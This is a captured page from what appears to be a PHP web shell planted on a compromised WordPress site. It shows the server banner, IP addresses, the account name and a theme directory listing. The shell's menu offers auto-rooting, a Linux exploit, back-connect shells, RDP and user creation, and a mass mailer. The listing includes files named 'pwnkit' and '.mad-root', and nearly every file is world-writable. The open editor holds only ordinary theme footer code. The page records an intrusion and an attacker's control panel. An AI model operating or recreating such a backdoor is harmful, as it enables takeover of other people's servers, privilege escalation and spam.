Linux webm006.cluster127.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.127.20.6 | : 216.73.217.174
Cant Read [ /etc/named.conf ]
7.4.33
kvtechr
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
kvtechr /
www /
wp-content /
themes /
qwery /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxrwxrwx
front-page
[ DIR ]
drwxrwxrwx
images
[ DIR ]
drwxrwxrwx
includes
[ DIR ]
drwxrwxrwx
js
[ DIR ]
drwxrwxrwx
plugins
[ DIR ]
drwxrwxrwx
skins
[ DIR ]
drwxrwxrwx
theme-options
[ DIR ]
drwxrwxrwx
theme-specific
[ DIR ]
drwxrwxrwx
.htaccess
237
B
-rwxrwxrwx
.mad-root
0
B
-rw-r--r--
404.php
233
B
-rwxrwxrwx
blog.php
1.63
KB
-rwxrwxrwx
changelog.txt
3.33
KB
-rwxrwxrwx
comments.php
10.66
KB
-rwxrwxrwx
footer.php
2.8
KB
-rwxrwxrwx
front-page.php
1.14
KB
-rwxrwxrwx
functions-num-compiler.php
181.15
KB
-rwxrwxrwx
functions-num.php
181.15
KB
-rwxrwxrwx
functions.php
60.73
KB
-rwxrwxrwx
functions.php_bak
41.8
KB
-rwxrwxrwx
functions.txt
41.8
KB
-rwxrwxrwx
header.php
6.57
KB
-rwxrwxrwx
image.php
1.3
KB
-rwxrwxrwx
index.php
2.71
KB
-rwxrwxrwx
page.php
472
B
-rwxrwxrwx
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.16
KB
-rwxrwxrwx
rtl.css
181.1
KB
-rwxrwxrwx
screenshot.jpg
88.33
KB
-rwxrwxrwx
sidebar-pic.php
0
B
-rwxrwxrwx
sidebar.php
2.85
KB
-rwxrwxrwx
single.php
5.36
KB
-rwxrwxrwx
style.css
4.69
KB
-rwxrwxrwx
style.css.map
1.76
KB
-rwxrwxrwx
style.scss
4.23
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The Footer: widgets area, logo, footer menu and socials * * @package QWERY * @since QWERY 1.0 */ do_action( 'qwery_action_page_content_end_text' ); // Widgets area below the content qwery_create_widgets_area( 'widgets_below_content' ); do_action( 'qwery_action_page_content_end' ); ?> </div> <?php do_action( 'qwery_action_after_page_content' ); // Show main sidebar get_sidebar(); do_action( 'qwery_action_content_wrap_end' ); ?> </div> <?php do_action( 'qwery_action_after_content_wrap' ); // Widgets area below the page and related posts below the page $qwery_body_style = qwery_get_theme_option( 'body_style' ); $qwery_widgets_name = qwery_get_theme_option( 'widgets_below_page' ); $qwery_show_widgets = ! qwery_is_off( $qwery_widgets_name ) && is_active_sidebar( $qwery_widgets_name ); $qwery_show_related = qwery_is_single() && qwery_get_theme_option( 'related_position' ) == 'below_page'; if ( $qwery_show_widgets || $qwery_show_related ) { if ( 'fullscreen' != $qwery_body_style ) { ?> <div class="content_wrap"> <?php } // Show related posts before footer if ( $qwery_show_related ) { do_action( 'qwery_action_related_posts' ); } // Widgets area below page content if ( $qwery_show_widgets ) { qwery_create_widgets_area( 'widgets_below_page' ); } if ( 'fullscreen' != $qwery_body_style ) { ?> </div> <?php } } do_action( 'qwery_action_page_content_wrap_end' ); ?> </div> <?php do_action( 'qwery_action_after_page_content_wrap' ); // Don't display the footer elements while actions 'full_post_loading' and 'prev_post_loading' if ( ( ! qwery_is_singular( 'post' ) && ! qwery_is_singular( 'attachment' ) ) || ! in_array ( qwery_get_value_gp( 'action' ), array( 'full_post_loading', 'prev_post_loading' ) ) ) { // Skip link anchor to fast access to the footer from keyboard ?> <a id="footer_skip_link_anchor" class="qwery_skip_link_anchor" href="#"></a> <?php do_action( 'qwery_action_before_footer' ); // Footer $qwery_footer_type = qwery_get_theme_option( 'footer_type' ); if ( 'custom' == $qwery_footer_type && ! qwery_is_layouts_available() ) { $qwery_footer_type = 'default'; } get_template_part( apply_filters( 'qwery_filter_get_template_part', "templates/footer-" . sanitize_file_name( $qwery_footer_type ) ) ); do_action( 'qwery_action_after_footer' ); } ?> <?php do_action( 'qwery_action_page_wrap_end' ); ?> </div> <?php do_action( 'qwery_action_after_page_wrap' ); ?> </div> <?php do_action( 'qwery_action_after_body' ); ?> <?php wp_footer(); ?> </body> </html>
Close